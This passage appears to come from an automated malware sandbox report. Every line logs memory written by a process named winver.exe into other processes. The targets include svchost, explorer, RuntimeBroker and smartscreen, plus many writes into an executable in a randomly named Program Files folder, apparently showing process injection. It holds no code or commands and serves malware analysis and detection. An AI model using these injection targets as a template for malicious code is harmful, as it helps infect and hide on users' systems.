            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\sihost.exe base: AC0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\svchost.exe base: 910000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\svchost.exe base: 9A0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\ctfmon.exe base: A50000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\explorer.exe base: 1370000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\svchost.exe base: D40000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 110000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AB0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\smartscreen.exe base: 290000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 3D0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 900000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 180000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 190000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\svchost.exe base: D0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\dllhost.exe base: 260000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\SysWOW64\cscript.exe base: 4D80000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\conhost.exe base: 880000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\conhost.exe base: 900000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: C50000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 890000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 30000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1530000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2770000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B80000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 8B0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B50000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2EB0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2D10000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2B40000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2E20000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: BE0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2CA0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: C40000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1120000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2F40000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: F90000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B30000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2F60000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 3070000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 14D0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B90000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B70000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1610000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2C90000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: CC0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 660000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: AD0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 14B0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1010000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: D90000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: F10000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 6E0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 930000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: AD0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2360000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 970000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1050000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 7B0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1020000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 9C0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 850000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: AA0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: CE0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: F70000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: FC0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B40000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 20E0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 680000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B30000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2870000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2CC0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 5A0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2C60000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 12F0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B50000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2280000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: A50000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1A0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: A50000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: FD0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: F90000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1040000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B30000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2C90000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1240000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: AB0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: FD0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B30000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: FD0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: AE0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2380000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B80000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 7F0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2DD0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2F30000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1200000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2CE0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B90000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 28C0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1220000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 900000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: F10000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 28F0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2820000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: F20000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: BE0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2D80000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: E30000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: A60000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 29B0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 540000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B70000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: EE0000Jump to behavior
